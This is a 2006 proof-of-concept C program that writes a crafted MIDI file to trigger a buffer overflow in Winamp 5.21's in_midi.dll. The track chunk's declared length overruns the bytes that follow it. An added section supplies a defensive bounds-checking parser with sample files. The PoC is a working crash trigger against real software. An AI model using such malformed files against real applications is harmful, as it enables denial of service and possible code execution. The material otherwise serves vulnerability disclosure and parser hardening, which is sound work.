Winamp <= 5.21 (Midi File Header Handling) Buffer Overflow PoC
Source: vfocus.net  Author: BassReFLeX  Published: 2006-06-21

/*

* ********************************************** *
* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *
* ********************************************** *
* PoC coded by: BassReFLeX *
* Date: 19 Jun 2006 *
* ********************************************** *

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void usage(char* file);

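/* Standard MIDI File header chunk ("MThd", length 6) followed by the
   start of a track chunk ("MTrk") and the first bytes of its length. */
char header[] = "\x4D\x54\x68\x64\x00\x00"
                "\x00\x06\x00\x00\x00\x01"
                "\x00\x60\x4D\x54\x72\x6B"
                "\x00\x00";

/* Bytes written immediately after the header. */
char badc0de[] = "\xFF\xFF\xFF\xFF\xFF\xFF"
                 "\xFF\xFF\xFF\xFF\xFF\xFF";
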
int main(int argc,char* argv[])
{
    FILE *f;

    system("cls"); /* clear the console (Windows) */
    printf("\n* ********************************************** *");
    printf("\n* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *");
    printf("\n* ********************************************** *");
    printf("\n* PoC coded by: BassReFLeX *");
    printf("\n* Date: 19 Jun 2006 *");
    printf("\n* ********************************************** *");

    if ( argc!=2 )
    {
        usage(argv[0]); /* prints usage and exits */
    }

    /* Binary mode so the bytes are written unmodified on Windows. */
    f = fopen(argv[1],"wb");
    if ( !f )
    {
        printf("\nFile couldn't open!");
        exit(1);
    }

    printf("\n\nWriting crafted .mid file...");
    /* sizeof() counts each array's terminating NUL, so it is written too. */
    fwrite(header,1,sizeof(header),f);
    fwrite(badc0de,1,sizeof(badc0de),f);
    fclose(f); /* flush and close before reporting success */
    printf("\nFile created successfully!");
    printf("\nFile: %s",argv[1]);
    return 0;
}

void usage(char* file)
{
    printf("\n\n");
    printf("\n%s <Filename>",file);
    printf("\n\nFilename = .mid crafted file. Example: winsploit.exe craftedsh1t.mid");
    exit(1);
}
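
The file this PoC writes carries an MTrk chunk whose declared length (0xFF) is larger than the 12 bytes that follow it. As an added example (not part of the original PoC and not Winamp's code), here is a bounds check a MIDI parser or file scanner can run before touching chunk data; `smf_check`, the status names and `good_file` are this example's own, and `poc_file` is the byte sequence the arrays above produce.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Status names are this example's own. */
enum smf_status { SMF_OK, SMF_TRUNCATED, SMF_BAD_MAGIC, SMF_BAD_HEADER_LEN, SMF_CHUNK_OVERRUN };

/* Chunk lengths in a Standard MIDI File are 32-bit big-endian. */
static uint32_t be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* Walk every chunk and require each declared length to fit in the bytes left. */
enum smf_status smf_check(const unsigned char *buf, size_t len)
{
    size_t off = 14;                                    /* MThd id + length + 6 data bytes */
    if (len < 14) return SMF_TRUNCATED;
    if (memcmp(buf, "MThd", 4) != 0) return SMF_BAD_MAGIC;
    if (be32(buf + 4) != 6) return SMF_BAD_HEADER_LEN;  /* strict: standard value only */
    while (off < len) {
        uint32_t clen;
        if (len - off < 8) return SMF_TRUNCATED;        /* no room for id + length */
        clen = be32(buf + off + 4);
        off += 8;
        if (clen > len - off) return SMF_CHUNK_OVERRUN; /* length points past end of file */
        off += clen;
    }
    return SMF_OK;
}

/* The 34 bytes written by the PoC: header[] and badc0de[], each with its NUL. */
static const unsigned char poc_file[] = {
    'M','T','h','d', 0,0,0,6, 0,0, 0,1, 0,0x60, 'M','T','r','k', 0,0, 0,
    0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF, 0
};

/* Constructed well-formed sample: one track holding only an end-of-track event. */
static const unsigned char good_file[] = {
    'M','T','h','d', 0,0,0,6, 0,0, 0,1, 0,0x60,
    'M','T','r','k', 0,0,0,4, 0x00,0xFF,0x2F,0x00
};

int main(void)
{
    printf("poc_file:  %d\n", (int)smf_check(poc_file, sizeof poc_file));
    printf("good_file: %d\n", (int)smf_check(good_file, sizeof good_file));
    return 0;
}
```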



 